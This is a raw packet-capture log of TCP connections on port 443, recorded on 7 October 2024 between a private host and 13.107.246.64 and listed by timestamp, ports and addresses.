Oct 7, 2024 18:46:20.319964886 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.320084095 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.327027082 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.327033997 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.327307940 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.337374926 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.383409977 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.431273937 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.431314945 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.431335926 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.431479931 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.431499958 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.431592941 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.514271975 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.514311075 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.514436007 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.514451027 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.514497042 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.516076088 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.516098976 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.516146898 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.516151905 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.516196012 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.596704960 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.596735954 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.596782923 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.596791029 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.596837997 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.597412109 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.597434998 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.597492933 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.597497940 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.597547054 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.598781109 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.598809004 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.598875046 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.598879099 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.598932981 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.599762917 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.599792957 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.599844933 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.599849939 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.599879980 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.599910021 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.679544926 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.679573059 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.679661989 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.679670095 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.679716110 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.680565119 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.680588961 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.680634022 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.680638075 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.680681944 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.681279898 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.681307077 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.681350946 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.681355000 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.681379080 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.681404114 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.682547092 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.682571888 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.682610989 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.682615042 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.682651043 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.682672024 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.683576107 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.683600903 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.683641911 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.683645964 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.683695078 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.684541941 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.684570074 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.684627056 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.684632063 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.684649944 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.684670925 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.685317993 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.685374022 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.685379982 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.685410023 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.685417891 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.685456038 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.685569048 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.685584068 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.685605049 CEST	49713	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.685611010 CEST	443	49713	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.728739023 CEST	49715	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.728792906 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.728878975 CEST	49715	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.730494976 CEST	49716	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.730547905 CEST	443	49716	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.730627060 CEST	49716	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.730916023 CEST	49715	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.730933905 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.731707096 CEST	49716	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.731725931 CEST	443	49716	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.732728004 CEST	49717	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.732784986 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.732853889 CEST	49717	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.732995033 CEST	49717	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.733007908 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.734195948 CEST	49718	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.734203100 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.734268904 CEST	49718	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.735032082 CEST	49719	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.735061884 CEST	443	49719	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.735130072 CEST	49719	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.735328913 CEST	49719	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.735347986 CEST	443	49719	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:20.735490084 CEST	49718	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:20.735574961 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.393157959 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.393738031 CEST	49718	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.393762112 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.394485950 CEST	49718	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.394490957 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.394928932 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.395324945 CEST	49715	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.395348072 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.395730972 CEST	49715	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.395735979 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.403444052 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.403736115 CEST	443	49719	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.403865099 CEST	49717	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.403882980 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.404316902 CEST	49719	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.404347897 CEST	443	49719	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.404364109 CEST	49717	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.404369116 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.404717922 CEST	49719	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.404723883 CEST	443	49719	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.413206100 CEST	443	49716	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.413794041 CEST	49716	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.413809061 CEST	443	49716	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.414207935 CEST	49716	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.414212942 CEST	443	49716	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.489833117 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.489907026 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.489989996 CEST	49718	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.490021944 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.490048885 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.490062952 CEST	49718	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.490097046 CEST	49718	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.490351915 CEST	49718	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.490351915 CEST	49718	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.490370989 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.490380049 CEST	443	49718	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.493264914 CEST	49722	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.493314028 CEST	443	49722	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.493439913 CEST	49722	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.493485928 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.493546963 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.493601084 CEST	49715	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.493618011 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.493676901 CEST	49715	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.493680000 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.493715048 CEST	49715	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.493732929 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.493747950 CEST	49715	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.493755102 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.493765116 CEST	49715	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.493767977 CEST	443	49715	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.493911982 CEST	49722	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.493930101 CEST	443	49722	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.496191025 CEST	49723	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.496243954 CEST	443	49723	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.496310949 CEST	49723	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.496465921 CEST	49723	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.496479988 CEST	443	49723	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.503377914 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.503421068 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.503478050 CEST	49717	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.503501892 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.503654957 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.503712893 CEST	49717	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.503712893 CEST	49717	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.503712893 CEST	49717	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.503732920 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.504252911 CEST	443	49719	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.504317999 CEST	443	49719	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.504373074 CEST	49719	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.504488945 CEST	49719	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.504504919 CEST	443	49719	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.504515886 CEST	49719	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.504522085 CEST	443	49719	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.506424904 CEST	49724	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.506527901 CEST	443	49724	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.506609917 CEST	49724	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.506772995 CEST	49724	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.506808996 CEST	443	49724	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.507535934 CEST	49725	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.507566929 CEST	443	49725	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.507635117 CEST	49725	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.508223057 CEST	49725	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.508239985 CEST	443	49725	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.512991905 CEST	443	49716	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.513052940 CEST	443	49716	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.513093948 CEST	49716	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.513251066 CEST	49716	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.513256073 CEST	443	49716	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.513289928 CEST	49716	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.513294935 CEST	443	49716	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.516086102 CEST	49726	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.516107082 CEST	443	49726	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.516206980 CEST	49726	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.516483068 CEST	49726	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.516496897 CEST	443	49726	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:21.811876059 CEST	49717	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:21.811938047 CEST	443	49717	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.235595942 CEST	443	49723	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.236143112 CEST	49723	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.236171961 CEST	443	49723	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.236761093 CEST	49723	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.236767054 CEST	443	49723	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.243766069 CEST	443	49724	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.244230032 CEST	49724	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.244271994 CEST	443	49724	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.244776964 CEST	49724	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.244785070 CEST	443	49724	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.253072023 CEST	443	49722	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.253448009 CEST	49722	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.253475904 CEST	443	49722	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.253626108 CEST	443	49725	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.253902912 CEST	49722	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.253909111 CEST	443	49722	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.254200935 CEST	49725	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.254223108 CEST	443	49725	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.254606962 CEST	49725	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.254611969 CEST	443	49725	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.269685030 CEST	443	49726	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.279567003 CEST	49726	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.279582024 CEST	443	49726	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.281666040 CEST	49726	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.281676054 CEST	443	49726	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.330780983 CEST	443	49723	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.330854893 CEST	443	49723	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.330914021 CEST	49723	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.331154108 CEST	49723	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.331173897 CEST	443	49723	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.331182957 CEST	49723	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.331187963 CEST	443	49723	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.334461927 CEST	49727	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.334518909 CEST	443	49727	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.334578037 CEST	49727	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.334732056 CEST	49727	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.334744930 CEST	443	49727	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.343813896 CEST	443	49724	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.343871117 CEST	443	49724	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.343920946 CEST	49724	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.344088078 CEST	49724	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.344098091 CEST	443	49724	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.344110966 CEST	49724	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.344116926 CEST	443	49724	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.346887112 CEST	49728	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.346913099 CEST	443	49728	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.346971989 CEST	49728	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.347126961 CEST	49728	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.347136974 CEST	443	49728	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.355053902 CEST	443	49722	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.355107069 CEST	443	49722	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.355143070 CEST	49722	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.355355978 CEST	49722	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.355372906 CEST	443	49722	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.355381012 CEST	443	49725	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.355396986 CEST	49722	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.355401993 CEST	443	49722	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.355448961 CEST	443	49725	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.355518103 CEST	49725	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.355631113 CEST	49725	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.355643988 CEST	443	49725	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.356218100 CEST	49725	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.356224060 CEST	443	49725	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.358305931 CEST	49729	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.358324051 CEST	443	49729	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.358386040 CEST	49729	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.358500957 CEST	49729	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.358510971 CEST	443	49729	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.359116077 CEST	49730	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.359122038 CEST	443	49730	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.359170914 CEST	49730	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.359484911 CEST	49730	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.359496117 CEST	443	49730	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.420299053 CEST	443	49726	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.420367956 CEST	443	49726	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.420522928 CEST	49726	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.421571016 CEST	49726	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.421571016 CEST	49726	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.421591997 CEST	443	49726	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.421605110 CEST	443	49726	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.424351931 CEST	49731	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.424396038 CEST	443	49731	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:22.424488068 CEST	49731	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.425050020 CEST	49731	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:22.425062895 CEST	443	49731	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.016484976 CEST	443	49730	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.016555071 CEST	443	49727	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.020175934 CEST	443	49729	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.024564028 CEST	49730	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.024609089 CEST	443	49730	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.025235891 CEST	49730	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.025253057 CEST	443	49730	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.025753975 CEST	49727	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.025842905 CEST	443	49727	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.026199102 CEST	49727	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.026213884 CEST	443	49727	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.026581049 CEST	49729	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.026607037 CEST	443	49729	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.027123928 CEST	49729	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.027137041 CEST	443	49729	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.423744917 CEST	443	49728	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.425277948 CEST	49728	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.425277948 CEST	49728	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.425316095 CEST	443	49728	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.425326109 CEST	443	49728	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.435302019 CEST	443	49731	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.435853958 CEST	49731	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.435878992 CEST	443	49731	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.436463118 CEST	49731	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.436471939 CEST	443	49731	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.566500902 CEST	443	49727	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.566564083 CEST	443	49727	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.566625118 CEST	49727	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.566909075 CEST	49727	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.566947937 CEST	443	49727	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.566976070 CEST	49727	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.566991091 CEST	443	49727	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.567739010 CEST	443	49729	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.567816973 CEST	443	49729	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.567862034 CEST	49729	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.568094015 CEST	49729	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.568106890 CEST	443	49729	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.568116903 CEST	49729	443	192.168.2.5	13.107.246.64
